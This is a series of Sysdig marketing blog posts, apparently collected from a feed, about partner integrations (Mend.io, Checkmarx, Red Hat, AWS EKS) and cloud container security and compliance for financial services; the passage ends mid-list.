As organizations increase the use of cloud-native services like containers and Kubernetes, they struggle to keep up with the high number of detected security issues. Together, Mend.io and Sysdig give organizations struggling with limited time and resources more effective ways to target the remediation of real risk. By providing insights into risk detected at runtime, security teams can prevent and defend with greater confidence.

The Growing Challenge of Securing Workloads

Gartner predicts that by 2025, 45% of large enterprises will have experienced attacks on their software supply chains. Threat actors are constantly looking for ways to introduce and exploit vulnerabilities to infiltrate a target organization’s network. As containers continue to grow in usage, they become an ideal delivery vehicle for malicious code.

The volume of newly discovered vulnerabilities continues to increase every year. In fact, the total number of Common Vulnerabilities and Exposures (CVEs) is predicted to increase by 25% in 2024. The never-ending flow of new vulnerabilities overwhelms developers and security teams alike. These teams need better ways to filter through the noise and achieve their ultimate goal of delivering software innovation, securely.

Taming Application Security with Mend.io and Sysdig

Sysdig and Mend.io have come together to address the frustration of chasing endless software vulnerabilities.

• Mend.io has over a decade of experience helping global organizations build world-class AppSec programs. Mend Container identifies and prioritizes critical security vulnerabilities, providing actionable remediation suggestions and a full picture of your open source libraries and dependencies.
• Sysdig brings a deep understanding of what’s happening at runtime. As the creator of Falco open source, Sysdig is a pioneer in real-time visibility into abnormal behavior, potential security threats, and compliance violations with its comprehensive runtime security.

Through its vantage point at runtime, Sysdig profiles containers to pinpoint the software packages that are in use vs. those that are not. Armed with these insights, Mend.io enables developers to quickly target the remediation of vulnerabilities and real risk based on severity, exploitability, reachability, and runtime exposure.

How it Works: Mend.io and Sysdig Integration

Mend Container, when integrated with both Mend SCA and Sysdig Runtime Insights API, incorporates the runtime context of software packages into the Mend SCA product and container scanning results. By providing a view into runtime context, developers and security teams can confirm application deployment and behavior in production and set preferred remediation priorities and scoring.

Mend.io goes beyond CVSS scores to help teams calculate risk. By analyzing aspects such as reachability and exploitability – and now runtime usage – it allows you to move beyond theoretical risk to understand the risk in the context of your application specifically.

Additionally, Mend Container is able to provide ownership insights for applications that help security teams identify associated repos and application ownership for vulnerable packages. These insights enable automation and acceleration of the remediation process across teams.

Secure from Code to Cloud

With potential threats taking many forms across the software life cycle, both pre- and post-production, organizations need a way to protect applications from multiple forms of risk. Together, Mend.io and Sysdig help users leverage both “Shift Left” and “Shield Right” security strategies.

Even the best AppSec program alone is not enough as it is impossible to guard against every unknown threat that may arise in production. Here, Sysdig’s runtime security plays a key role in detecting threats in real-time across your containers and cloud. “Shield Right” focuses on operational practices to prevent security incidents, as well as security monitoring and behavioral analysis to detect and respond to events when they occur.

With Sysdig and Mend.io, security teams can both harden their security posture to prevent attacks before they happen and continuously monitor for active risk to keep cloud environments and applications safe.

Build a World-Class Security Program with Mend.io and Sysdig

As organizations accelerate delivery of cloud applications, ensuring end-to-end security across the software supply chain and into production is key to success. We are confident that joint customers of Mend.io and Sysdig will be able to expedite responsiveness, streamline vulnerability remediation, and drive a highly efficient and automated security workflow. The AppSec expertise of Mend.io and cloud-native application protection from Sysdig empower developer and security teams to move faster and focus on innovation.

Visit our Mend.io integration page for access to additional resources and to learn more about our joint solution.

The post Accelerating AppSec with Mend.io and Sysdig appeared first on Sysdig.

Centered around sharing valuable insights that accelerate and simplify vulnerability management, posture management, and cloud detection & response, the Runtime Insights Partner Ecosystem helps cloud users better prioritize risk, automate workflows, ensure compliance, and respond at cloud speed. We’re thrilled to be supported by a roster of partners representing a wide spectrum of leading industry solutions.

Read on to learn more about the unique collaborations that equip cloud teams to bolster cloud security.

Collaborating to solve cloud security challenges

Cloud security is a multifaceted challenge. Cloud attacks happen fast. The speed and sophistication of cloud attacks mean that security teams and tools must be able to move faster than an attacker. And, there’s no such thing as a one-size-fits-all solution. Successful cloud security programs require a breadth of coverage to protect against known and unknown threats.

Over time, to meet the needs of distinct teams and particular use cases, you’ve likely rolled out a wide range of tooling across cloud security domains from Identity and AppSec to Threat Detection and Incident Response. Wouldn’t it be great to have connective tissue across these domains to share insights so you can move faster and optimize outcomes? This is the goal of our integration ecosystem.

The core of our collaboration:
Runtime Insights

At Sysdig, our cloud security platform is designed with runtime visibility at its core. Built on Falco open source, our deep real-time understanding of what’s happening at runtime helps users pinpoint advanced threats but also delivers intel that adds value across many cloud security domains. This intel–what we call runtime insights–provides meaningful runtime context that is able to enrich solutions from other providers in the ecosystem. Here are a few examples:

• Vulnerability prioritization: AppSec solutions identify and prioritize in-use vulnerable packages in your running workloads.
• Active threat detection & response: Incident response solutions incorporate threat events and context for analysis and response automation.
• Permission management: Identity solutions get visibility into inactive users and excessive permissions to enforce least-privilege access.
• Posture drift control: Infrastructure-as-code (IaC) and GitOps tools gain visibility into deployment inconsistencies to automate required remediations.




Runtime Insights Ecosystem Partner solution highlights

Our partners bring domain expertise across domains like AppSec, Next-gen SIEM and SOAR, XDR, IT Service Management, and more. When combined with Sysdig, these partners give users an added advantage in defending against cloud threats – from shift left to shield right.

Here is a sample of key integrations we deliver together with key partners.

• Checkmarx – Checkmarx One uses runtime insights to prioritize vulnerabilities associated with running container packages that pose the most risk.
• Cybereason – With runtime insights, Cybereason XDR enables teams to manage cloud risk with XDR context from the broader enterprise.
• Docker Scout – Docker Scout uses runtime insights to identify active images and packages to spotlight risk and help secure your software supply chain.
• Elastic – With Elasticsearch, Elastic helps practitioners accelerate investigation and response using runtime insights from the Sysdig CNAPP platform.
• Google Chronicle – Chronicle enables Sysdig users to extract more value from insights collected from cloud workloads in runtime environments.
• Mend.io – Mend Container leverages runtime insights to provide users with end-to-end, risk-based vulnerability prioritization and remediation.
• Netskope – Sysdig and Netskope correlate cloud threat insights across users and workloads to deliver high-fidelity protection for users, apps, and data.
• PagerDuty – With Sysdig and PagerDuty, teams more effectively detect and respond to threats and anomalies across containers, Kubernetes, and cloud.
• ServiceNow – ServiceNow CVR incorporates Sysdig-detected vulnerabilities and in-use insights to enable faster assignment, triage, and response.
• Snyk – Snyk and Sysdig deliver feedback and visibility from production back to developers, eliminating the noise of container vulnerabilities.
• Sumo Logic – Sumo Logic enables Sysdig users to accelerate cloud insights into action with its cloud SIEM and SOAR capabilities.
• Tines – Tines taps into the Sysdig API with its smart, secure workflow builder to enable intelligent automation for swift response to cloud security threat events.


For an additional view into all of the cloud and tech partner integrations available visit sysdig.com/integrations.

A two-way street: Partner data makes Sysdig better

Our partnerships aren’t just about the cloud security insights available from Sysdig. Many of our partners provide critical data sources that enable Sysdig to detect threats across multiple domains and provide critical cloud security insights. Here are a few examples:

• Cloud logs: AWS CloudTrail, Google Cloud Audit Logs, and Azure Platform Logs provide insight into cloud account and service activity.
• Identity Logs: Logs from solutions like Okta and Microsoft Entra enable the detection of anomalous events to protect against identity attacks.
• GitHub Logs: GitHub event data enables Sysdig to detect risks to GitHub repos like leaking secrets, exfiltration of sensitive data, and cryptomining through GitHub Actions.




Driving better cloud security outcomes together

The launch of the Runtime Insights Partner Ecosystem marks a step forward in cloud security, harnessing the power of leading solutions across the industry along with runtime insights from Sysdig. Our goal is to empower organizations to stay ahead of threats and effectively safeguard cloud environments.

What’s next? Visit our Runtime Insights Ecosystem page to learn more about our work with solution partners.

The post Strengthening Cloud Security Together: Meet the Runtime Insights Partner Ecosystem appeared first on Sysdig.

]]> https://sysdig.com/blog/financial-services-organizations-secure-compliance/ Tue, 16 Jan 2024 17:30:00 +0000 https://sysdig.com/?p=82961 The stakes couldn’t be higher for financial services organizations. They have to protect customers’ money and privacy, while complying with...

The post How Financial Services Organizations Can Stay Compliant – Without Sacrificing Security appeared first on Sysdig.

]]> The stakes couldn’t be higher for financial services organizations. They have to protect customers’ money and privacy, while complying with technical requirements and governmental regulations. Complying with all those requirements poses a major, ongoing challenge for security teams, which are already under pressure to do more with less.

Cybercrime continues to grow, with every industry falling victim, at one time or another. Not surprisingly, though financial organizations have presented an appealing target. Ransomware attacks alone affected 74% of global financial institutions in 2021–2022 and the average cost of a data breach in the sector hit $5.72 million.

Financial details are highly prized and offer even inexperienced hackers an opportunity to make a quick buck: credit card numbers, for instance, can be easily sold for $30 each.

Increasingly, attackers are exploiting vulnerabilities in cloud security architectures to grab such valuable information, with Sysdig’s latest research finding that 65% of cloud attacks now target financial services companies and telcos. An insecure configuration lurking deep within a cloud stack can wreak havoc, allowing hackers to exploit the vulnerability.

At the same time, financial services organizations must stay compliant with constantly changing cybersecurity standards and governmental regulations. As cloud migration in the sector grows, security leaders face a balancing act. How do you deal with complex cloud security and compliance challenges, without slowing down the development of products that deliver growth? 

Staying compliant with evolving regulations

Managing compliance is becoming increasingly difficult for financial services organizations. They must keep track of more standards and regulations than ever, some of which are optional, some compulsory, some that vary by region, and many that overlap. There are technical standards, like those from NIST and ISO, data security standards like PCI-DSS, as well as governmental regulations, like GDPR, SOC, and GLBA…it’s a virtual alphabet soup of rules and regulations.

To meet these standards and regulations, financial services organizations need to have the proper controls, testing, and reporting abilities in place. If they don’t, they face loss of reputation and hefty fines; global financial service regulators imposed more than $7 billion in fines in 2022.  Ouch.

And of course, financial services organizations must still consider security requirements. As one of the most regulated industries in the world, banks must adopt security built for cloud-native environments to guard against evolving threats and reduce risk. The ability to prioritize vulnerabilities, detect threats in real-time, identify misconfigurations, audit activity, and measure compliance with regulations is critical for banks to realize the full benefits of the cloud.

Meeting the compliance challenge

To fully take advantage of the agility and speed the cloud offers, financial services organizations need a robust cloud-centric security architecture and tooling to improve visibility and control. To balance uptime with fast time-to-market, developers need tools and security platforms that work together –built on open standards so that they can be customized to compliance. Reducing the burden of alert fatigue helps developers spend less time fixing vulnerabilities, and more time developing secure products.

A series of point solutions that need to be painstakingly integrated can’t handle the compliance and security requirements of such a heavily regulated industry. They provide too many opportunities for vital alerts to be missed and too many possible opportunities for breaches.

The answer is a cloud-native application protection platform (CNAPP). A CNAPP can give you dramatically better visibility and control over your whole cloud-native application stack. A CNAPP provides a feedback loop that enables true end-to-end coverage of the cloud-native application lifecycle.

With a CNAPP, you get comprehensive coverage for security and compliance purposes. A CNAPP solution reveals interrelationships between the insights of various security points-of-view and across use cases to promote collaboration between DevSecOps, DevOps, and cloud security operations teams. It can be the equalizer when it comes to providing real-time knowledge of your cloud environment and incorporating common workflows, data correlations, meaningful insights, and remediation.

By adopting implementing a CNAPP, you can achieve a higher level of security across all major aspects of your cloud infrastructure and cloud-native application stack. And by embedding CNAPP security from the earliest stages of the development process all the way into production, you can ensure that what is delivered will maintain the highest levels of security and compliance integrity.

How Sysdig can help

Sysdig helps financial services organizations secure and accelerate Innovation in the cloud. Sysdig delivers cloud and container security that provides FinServ organizations with a single view of risk, so they can prioritize risk and remediate issues at their source, ensuring both compliance and security. With Sysdig, banks can leverage cloud services to stay competitive without risking exposure to cyber threats.

Sysdig delivers cloud and container security, so financial services organizations moving to the cloud, or already operating in the cloud, can effectively manage their security posture and stop attacks with no wasted time.

• Cloud detection and response: Thanks to multilayered threat detection, that combines Falco-based policies and Machine Learning (ML) detections, financial services organizations can respond to threats targeting workloads, cloud services, and identities more easily and confidently. 
• Compliance and posture management: With Sysdig, financial services organizations get built-in compliance tools to assess their security posture. Teams can easily identify and fix misconfigurations and ensure they follow best practices.
• Vulnerability management: Financial services firms get everything they need to identify and prioritize vulnerabilities, based on in-use risk exposure. By addressing real risk, they can accelerate the time to achieve security and compliance.
• Entitlement management: Sysdig helps financial services organizations gain visibility into cloud identities and manage permissions to eliminate excess permissions and enforce least privilege. 

The cloud has fundamentally changed the anatomy and nature of modern applications, IT infrastructures, and related processes. Financial services organizations are successfully taking advantage of the cloud to achieve new levels of agility. Key to this success is ensuring that firms can meet compliance and security requirements to deliver innovation while minimizing risk at cloud speed. The Sysdig CNAPP platform helps banks investing in cloud and cloud-native applications provide the protections needed to ensure compliance, and prevent, detect, and stop cloud threats.

Ready to take the next step for your organization’s compliance? Learn how Sysdig can help you.

The post How Financial Services Organizations Can Stay Compliant – Without Sacrificing Security appeared first on Sysdig.

]]> https://sysdig.com/blog/sysdig-amazon-eks-ready/ Thu, 30 Nov 2023 00:30:00 +0000 https://sysdig.com/?p=82136 Sysdig is an Amazon Elastic Kubernetes Service Ready partner, providing cloud security for Amazon EKS and Amazon EKS Anywhere.

The post Sysdig Achieves the Amazon EKS Ready Designation appeared first on Sysdig.

]]> Today Sysdig has been recognized for achieving the Amazon Elastic Kubernetes Service (Amazon EKS) Ready designation from Amazon Web Services (AWS). This specialization recognizes that the Sysdig cloud-native application protection platform (CNAPP) is validated by AWS Partner Solutions Architects to integrate with Amazon EKS and Amazon EKS Anywhere.

Amazon EKS Ready Partners like Sysdig offer AWS customers the ability to customize the Kubernetes solution to fit their business needs.



Why the AWS Service Ready Program matters

The AWS Service Ready Program is designed to validate software products built by AWS Partners that work with specific AWS services. AWS Partner Solution Architects technically validate these software products for their sound architecture and adherence to AWS best practices.

The Amazon EKS Ready designation helps customers quickly and easily find AWS Partner software solutions to run Kubernetes on AWS, on-premises, or edge. As a result, you can spend less time evaluating new tools and more time scaling their use of solutions that work on AWS.

Achieving the Amazon EKS Ready designation differentiates Sysdig as an AWS Partner with a product that works with Amazon EKS and Amazon EKS Anywhere and fully supports AWS customers.

How AWS customers use Sysdig with Amazon EKS

Sysdig’s cloud security platform helps Amazon EKS and Amazon EKS Anywhere users move faster. By correlating signals across cloud workloads, identities, and services, you’re able to quickly identify and resolve security issues.

For businesses innovating in the cloud, every second counts. To help AWS users keep pace, Sysdig Secure provides real-time security insights built on open source Falco. Together with Amazon EKS, Sysdig helps reduce your attack surface, detect threats in real time, and accelerate incident response. Equally important, with runtime insights you’re able to prioritize the vulnerabilities, misconfigurations, permissions, and runtime threats that matter most.



What Joint AWS and Sysdig Customers Say

Joint AWS and Sysdig customer, ICG Consulting, uses Sysdig along with Amazon EKS to gain cost and staffing efficiencies that help them compete with larger consulting firms.

Marcus Boelter, a technical consultant at ICG Consulting explains, “Between the strength of the Sysdig technology based on Falco and its partnership with AWS, we knew we could deliver even more quickly by adopting Sysdig.”

Read the case study.

Learn more about Sysdig and AWS

To sum up, as an Amazon EKS Ready Partner, Sysdig helps you effectively manage cloud security and compliance. Whether for containerized workloads and orchestration, or for your surrounding cloud services, Sysdig can help strengthen your cyber resilience and move faster in the cloud.

To learn more, check out these resources:

• AWS and Sysdig solution page
• On-demand webinar: When Seconds Matter: Real-Time Cloud Security With AWS and Sysdig

The post Sysdig Achieves the Amazon EKS Ready Designation appeared first on Sysdig.

]]> https://sysdig.com/blog/sysdig-achieves-red-hat-vulnerability-scanner-certification/ Fri, 10 Nov 2023 14:00:00 +0000 https://sysdig.com/?p=34624 Image vulnerability scanning is a critical first line of defense for security with containers and Kubernetes. In February 2021, Sysdig...

The post Sysdig achieves Red Hat Vulnerability Scanner Certification appeared first on Sysdig.

]]> Image vulnerability scanning is a critical first line of defense for security with containers and Kubernetes. In February 2021, Sysdig Secure was recognized by Red Hat as a certified Red Hat security partner. At that time, based on Sysdig’s former Vulnerability Scanner, the Sysdig team worked to standardize on Red Hat’s published security data with Sysdig Secure.

Today, Sysdig announces the renewal of the Red Hat Vulnerability Scanner certification for the last release of its Vulnerability Scanner Engine. With this certification, achieved through collaboration with the team at Red Hat, Sysdig can not only provide more consistency for container vulnerability scanning results with Red Hat-published images and related packages, but also bring some of its killer features, like Sysdig Risk Spotlight powered by runtime insights. As a result, mutual customers benefit from a higher level of accuracy, transparency, and trust in detecting, prioritizing, and fixing Common Vulnerabilities and Exposures (CVEs) with in-use data from your environments.

Driving consistency for scan results

Modern application development, built on CI/CD pipelines, containers, and open source, moves at a fast pace. There is an inherent security risk as organizations assemble code to save time, instead of writing it from scratch. Finding ways to automate security scanning for images is top of mind for DevOps teams. Image scanning helps to secure the developer build pipeline and automates the analysis of image contents and container configurations to identify and classify known security issues, vulnerabilities, and bad practices.

Red Hat recognized that vulnerability risk assessments for customers were often inconsistent due to different and varying security data sources and practices across partner offerings. We know this challenge! Sysdig Secure taps into vulnerability feeds from 15+ trusted sources, like Red Hat. Each of these CVE feeds is unique, yet valuable to the extent that correlating the contents of an image with a broader set of CVE data ensures a greater level of insight into vulnerable packages, files, etc. Standardization is a great move – Red Hat has the right idea. Consistency helps eliminate misinterpretations and saves time for teams building and running containers.



Vulnerability Management overview – Sysdig Secure

How it works

At a high level, here’s how this collaboration and standardization works.

1. Sysdig Secure consumes the publicly available Red Hat OVAL v2 security data feed.
2. With this information, Sysdig image scanning will understand what vulnerabilities affect Red Hat-supported packages and whether a fix (patch) is available.
3. Sysdig Vulnerability Scanner Engine scans images throughout the software lifecycle: pipeline, registry, and runtime.
4. Sysdig Secure displays the appropriate severity ratings for CVEs in scan results for every stage. For those images deployed at runtime, the in-use packages are also reported. That way, Red Hat users can prioritize and fix the security issues that matter most.
Vulnerability Management with Runtime Insights – Sysdig Secure

Securing build pipelines

Nowadays, it’s quite common to see DevOps teams embracing “shift left” security practices. Their goal is to apply a security lens earlier in the development lifecycle. The annual Sysdig 2023 Cloud-Native Security and Usage Report found that 42% of images scanned for the first time happen in the earliest stages of the software lifecycle, while around 50% of the images are scanned for the first time at runtime.



A likely reason that the practice of scanning in runtime is ranked highest is due to the use of third-party software downloaded from vendors. Considered trusted sources, DevOps teams may presume the images are secure and save the time and effort of scanning in the CI/CD pipeline and registry.

Considering security implications for container images earlier in the development lifecycle helps close the door to attackers and reduce the possibility of unexpected and unwanted activity impacting your running containers.

The Power of Runtime Insights

As indicated in the Sysdig 2023 Cloud-Native Security and Usage Report above, a significant amount of images are scanned for the first time at runtime. This indicates that many users may be exposed to potential security threats in the latest software lifecycle stage. The recommendation is clear: the earlier you check for vulnerabilities, the better. Detecting and fixing security issues in the early development stages prevents you from running into serious problems when your workloads are up and running in production.

However, regardless of whether you enforce a shift left approach or not, companies still need to detect vulnerabilities and malicious code at runtime. The Sysdig TRT (Threat Research Team), after a thorough analysis, unveiled that more than 10% of malicious images are completely undetectable because of the advanced techniques attackers use to hide malicious code. That elevates the importance of detecting and responding against threats at cloud speed. The Sysdig Vulnerability Scanner gives users runtime insights to prioritize and fix security issues with runtime context, reducing and focusing DevSecOps team efforts on fixing the most urgent problems first.

If you want to learn more about the latest cloud threat patterns and how to overcome those challenges, check out the Sysdig 2023 Global Cloud Threat Report.

In-use package details for OpenShift images – Sysdig Secure

Conclusion:

By driving consistency and standardization with this new Red Hat Vulnerability Scanner Certification, Red Hat is helping customers who use Red Hat Certified security partner solutions have a more streamlined experience for assessing vulnerability risks of Red Hat products and packages. Aligning Sysdig Secure with Red Hat’s strategy and standard means Sysdig customers can gain improved clarity and accuracy for image scanning with CI/CD pipelines and registries.

If you want to learn more about how Sysdig helps secure Red Hat OpenShift and containers, visit our Red Hat partnership ecosystem page.

The post Sysdig achieves Red Hat Vulnerability Scanner Certification appeared first on Sysdig.

]]> https://sysdig.com/blog/prioritize-vulnerabilities-faster-with-checkmarx-and-sysdig/ Tue, 08 Aug 2023 10:50:00 +0000 https://sysdig.com/?p=77390 Organizations modernizing applications in the cloud find themselves drowning in vulnerabilities. There are too many alerts and not enough time...

The post Prioritize Vulnerabilities Faster with Checkmarx and Sysdig appeared first on Sysdig.

]]> Organizations modernizing applications in the cloud find themselves drowning in vulnerabilities. There are too many alerts and not enough time to address them all. Sysdig and Checkmarx announced a partnership today focused on solving this problem. By bringing runtime insights from Sysdig’s Cloud-Native Application Protection Platform (CNAPP) into the Checkmarx One AppSec platform, application security teams will have a new tool to reduce vulnerability noise up to 95% and help developers quickly get to the issues they need to address first.

Shift-left security has a problem: Noise

Shifting security left is key to ensuring companies reduce risks at very early development stages. Finding security vulnerabilities at the early stages of development is never a problem. Identifying vulnerabilities early in the development lifecycle is good, however, determining which security issues are noise and which pose real risk is the real challenge. Developers need help sorting through the mountain of issues to determine what they should fix first.

Runtime insights reduce vulnerability noise by up to 95%

Sysdig’s unique position at runtime provides the ability to profile running container images to identify in-use packages with vulnerabilities. By feeding this information back to vulnerability management tools, runtime insights help filter out vulnerable packages that are not actually used by the application. This helps developers and security teams focus on what’s really important, keeping development and delivery moving at a rapid pace.

Through a set of APIs, Sysdig makes the in-use package information available for use with external tools. This is the work we’re doing together with Checkmarx.

Using Sysdig runtime insights with Checkmarx One

Checkmarx Software Composition Analysis (SCA), part of the Checkmarx One platform, helps teams find vulnerable open source packages in their code and get remediation guidance to help quickly reduce open source risk. Runtime insights from Sysdig will add a new dimension for prioritizing and filtering vulnerabilities so developers can focus first on in-use packages.



Reduce vulnerability fatigue

Checkmarx SCA with Sysdig Secure provides an effective developer feedback loop with accurate, relevant, and actionable insight integrated into the software lifecycle. By focusing on vulnerabilities with runtime exposure, Checkmarx and Sysdig will help users gain a clear view of vulnerable components actually invoked – and which are not. This significantly reduces developer workload in terms of what needs to be remediated to address actual risk.

Focused remediation = faster delivery

Detecting and responding to security threats earlier and more efficiently has a direct impact on developer productivity. Teams who are able to focus more on application development and deployment, and less on unnecessary vulnerability remediation, will be better equipped to keep pace with rapid software delivery. This means a much faster time-to-market (TTM).

Shift left and shield right for a complete cloud-native security solution

We’re excited about the new Checkmarx and Sysdig partnership. Together we bring the cloud and cloud-native security solutions organizations need to effectively identify and respond to the vulnerabilities and threats from source to run.

Want to learn more about how it works?. Read our follow-up blog: How to Prioritize Vulnerabilities with Checkmarx and Sysdig Runtime Insights.

Additional resources:

• Partnership announcement
• Sysdig and Checkmarx partner page

The post Prioritize Vulnerabilities Faster with Checkmarx and Sysdig appeared first on Sysdig.

]]> https://sysdig.com/blog/financial-services-beyond-shift-left-security/ Thu, 27 Jul 2023 16:00:00 +0000 https://sysdig.com/?p=76773 Assessing the security of modern cloud applications requires security practices in development as well as production. Learn how financial services organizations can secure their cloud apps across the entire lifecycle.

The post Shift Left is Only Part of Secure Software Delivery in Financial Services appeared first on Sysdig.

]]> The way we manage our money has changed dramatically. In little more than a decade, we’ve gone from branch-led services to feature-rich apps offering 24/7 access to our money. Open Banking is driving product innovation, fintechs are setting a new benchmark for customer-centric experiences, and AI is taking personalization to a new level. Financial services have never been so accessible and convenient.

This startling progress could not have happened without relatively recent advances in software development, delivery, and operations.

Among those advances are the adoption of DevOps practices, continuous integration and continuous deployment (CI/CD) pipelines, use of cloud technologies, and automating everything from infrastructure provisioning to testing and quality assurance. These advances enable FinServ developers to deliver software faster, and to think about security and compliance earlier in design and development to ship safer software.

What is “Shift Left” and why does it matter?

“Shift left” is a philosophy for addressing the pitfalls of traditional waterfall-style development. In waterfall, a number of IT teams work over the course of many weeks or months, culminating in a big and beautiful software release. Of course, people make mistakes, forget things, and maybe don’t communicate well with each other. When it turns out that application elements don’t interoperate well, the teams frantically attempt to fix what’s possible and jettison what isn’t, with a very serious deadline staring them in the face. Products inevitably ship late, still somewhat broken, and with security bolted on as an afterthought.

To shift left means to introduce security processes and tooling earlier into the design and development phases. Security should be just as critical as functionality and quality. It’s a great idea because discovering a critical, build-failing vulnerability in a critical dependency after you’ve built dozens of functionalities on top of it hurts a lot more than if it’s found before you build anything at all. Maybe fixing the problem is as simple as using a newer version of a dependency, but now you have to make sure everything you’ve customized still works as intended.



There are a number of forms of application security testing (AST) that aim to detect code-level issues early in the systems’ development life cycle (SDLC). Two common types of application security testing when shifting left are software composition analysis (SCA) and static application security testing (SAST). Put simply, SAST tests the custom code your developers write; SCA tests dependencies you include in code.

Assessing the security of modern applications requires both testing types. If you believe shift left means not only finding problems but also fixing them, then developer-friendly tooling is necessary. Exactly what that means can be subjective depending on developer workflows in the organization, but at the very least, developers need self-service, seamless integration into their existing CI/CD toolchains and actionable results. Because most developers aren’t security experts, security findings must prioritize the riskiest problems, point to the source of the issue, and provide contextualized fixes, rather than making the developer hunt for them on their own.

Augmenting AST with runtime intelligence

One challenge with doing a lot of early testing – especially security testing – is that the more you test, the more findings you discover. Unfortunately, some of the results will be false positives and others may be true positives that pose a relatively low risk. Development teams with a high degree of security expertise must sift through and vet findings to prioritize flaws that are severe and actionable, but such practitioners are in short supply and this type of work is tedious.

Addressing the pitfalls of security testing isn’t simple, and it involves gathering as much contextual information as possible to begin to reason about the risk associated with each finding, usually expressed by what exploitable code is actually exercised.

Reasoning about vulnerability risk is not easy. We try to rank the criticality of issues to decide on an action. We can split the problem into two parts:

1. The context of the vulnerability itself includes metrics of severity, like the CVSS score, and threat intelligence, like whether exploits are publicly available or attacks are prevalent in the wild. This information is readily available from scanning tools and third-party sources like NVD, MITRE, and CISA.
2. The afflicted asset’s environmental context, however, is specific to your application and your infrastructure. Only your organization can really fill this part in. For example, is the application and data subject to specific compliance standards like PCI-DSS and GDPR? Is the impacted application protected by mitigating security controls? Is it exposed to the internet? Does the vulnerable component even get used at all? This is difficult or impossible to know until the application is running in its intended production environment.

Shift left is a way forward for modern cybersecurity, but the approach can be vastly enriched by pulling in Runtime Insights. This helps to prioritize what to fix first, removes friction, saves cycles of numerous IT teams, and reduces your organization’s vulnerability risk.

For Sysdig customer WorldPay, runtime context has proved invaluable in freeing up teams to concentrate on revenue-generating work. “If my team logs in and sees 500 vulnerabilities, they then think, ‘am I going to fix our vulnerability or am I going to spend my time developing something which creates some money?’” said Bernd Malmqvist, WorldPay’s Principal Container Platform Engineer. “Showing us what is important and how to fix it is key to reducing our risk.”

What happens after release?

The whole point of shift left is to release secure and compliant software faster, but what happens next? Your flawless, beautiful code is delighting your customers with its stunning feature set and impressive performance. Then, on some idle Friday afternoon, right before what should have been a long holiday weekend, you get hit with a horrendous zero-day that you could never have predicted even if you tried.

When that happens, you need to respond by quickly identifying all of the affected workloads running in your environment and prioritizing them for remediation. You may need to take those workloads offline to patch immediately, limit network access to them, or otherwise mitigate the problem if a patch is either unavailable or taking too long to deploy. The point is that in real life, shift left is only one part of a successful security program, and the protective, detective, and remediation activities for your production environments on the right are also critically important to your organization’s safety and success.

Conclusion

Shift left alone was never going to solve all security problems, but it does create foundations for reliable, fast, and secure software delivery pipelines. Security and development teams alike often suffer from a deluge of noise and few useful signals. What they really need are consistent and prescriptive ways to make sound decisions about risk. Gathering context from multiple sources through multiple layers of the stack, including runtime insights, substantially improves the quality of the information that DevSecOps teams receive from their tools and must act on.

Combining shift left and shield right best practices allows financial institutions to improve DevSecOps efficiency and accelerate software development without compromising security and compliance.

With developers able to spend less time on fixing minor vulnerabilities and maintaining compliance, they can focus on what they do best: building a better digital experience for customers.

Effi Goldstein, director of products at Snyk, co-authored this article. Check out Sysdig and Snyk’s 2022 Container Security Trends: Expert Panel Livestream for more information.

The post Shift Left is Only Part of Secure Software Delivery in Financial Services appeared first on Sysdig.

]]> https://sysdig.com/blog/cisos-financial-services/ Wed, 26 Jul 2023 15:30:00 +0000 https://sysdig.com/?p=76563 As competition ramps up in the financial services sector, agile cloud application development is critical to delivering seamless digital experiences customers want. Cloud-native development brings new security and compliance implications. Learn more on what you can do to respond to cloud security risk.

The post Five Things CISOs in Financial Services can do to make Containers Secure and Compliant appeared first on Sysdig.

]]> As competition ramps up in the financial services sector, agile and efficient application development is critical to delivering the seamless digital experiences today’s customers want. Chances are, if you’re not already moving applications to cloud and containers, you’re considering it.

But cloud-native development also brings security and compliance implications you may not have fully thought through. With 72% of containers living just five minutes or less, many legacy tools and processes simply cannot provide the visibility needed to satisfy auditors and stop breaches.

It goes without saying, the stakes are high. Financial institutions remain a premier target for cybercriminals and adversaries’ tactics are increasingly sophisticated. A 2022 survey found that 74% of global financial institutions experienced at least one ransomware attack over the previous year. Meanwhile, regulatory requirements are becoming ever more onerous and the penalties can be severe: current fines for violating PCI regulations stand at $5,000-100,000 per month until compliance is established.

In the absence of best practices, mistakes create openings for attackers. For instance, in 2019, a hacker managed to access over 100 million Capital One credit card applications and steal thousands of social security and bank account details. The attacker, a Capital One software engineer, gained access via a misconfigured web application firewall in a lapse that cost the company hundreds of millions of dollars. As development teams increasingly rely on open source software and third-party code, threats to container security are also arising from the software supply chain. In the recent Federal Civilian Executive Branch (FCEB) agency breach, the Iranian government exploited the Log4Shell vulnerability to deploy a cryptominer, steal credentials, and maintain persistence in the FCEB environment.

Speed is of the essence for safety and success

The later vulnerabilities are discovered, the greater the impact on your development speed – and your organization’s competitive edge. At a time when fast time-to-market is more urgent than ever to retain customers and meet the expectations of the next generation of consumers, CISOs must ensure security is explicitly designed into cloud and container environments to minimize last-minute delays.

To counter the risks, your security tool set must integrate specific FinServ security and compliance safeguards into DevOps processes. In addition to scanning for vulnerabilities, it’s important to also address runtime security and incident response.

Here are five key priorities you can work toward in your organization:

1. Scan for vulnerabilities in the build process

“Shifting left” involves building security checks into development so vulnerabilities are addressed before the container is deployed in production. These checks, which can be automated, help identify vulnerabilities faster and earlier and enable you to validate build configurations and image attributes. They can also scan third-party container libraries before applications are deployed to production. To put the importance of this critical step into perspective, Sysdig recently analyzed more than seven million containers that our customers are using on a daily basis. We found that 87% of container images running in production have a critical or high severity vulnerability. Typically, companies will fix these issues before production release.

2. Secure against runtime threats and attacks

“Shifting left” will help ensure the container is not deployed with vulnerabilities, but you also need to protect against emerging threats that can compromise your environment during runtime. This requires runtime detection of violations spanning a wide range of policies, such as unauthorized user activity, excessive privileges to containers, unauthorized network connections, and so on. Since it’s difficult to create manual policies for comprehensively detecting runtime threats, leveraging community-sourced and machine-learning policies will become critical. Another critical element is using an admission controller to govern allowable requests to the API server and prevent workloads with risky configurations, vulnerabilities, or other aspects that don’t meet security standards from running.

3. Continuously validate posture and compliance

CIS benchmarks provide a minimal set of hardening guidelines for containers. In addition, regulatory requirements are stringent and getting more so, and regulators are increasingly enforcing onerous financial penalties for failure to comply. However, meeting GDPR, PCI-DSS, NIST, ISO, etc. requirements can be complex in fast-changing container environments where containers change continually. According to our customer study, only 6% of containers now live for a week or more. Validating posture and compliance requires mapping each regulation and benchmark to specific policies and checks for the build phase of the software development life cycle and for runtime to ensure continual compliance in production.

4. Manage excessive cloud permissions

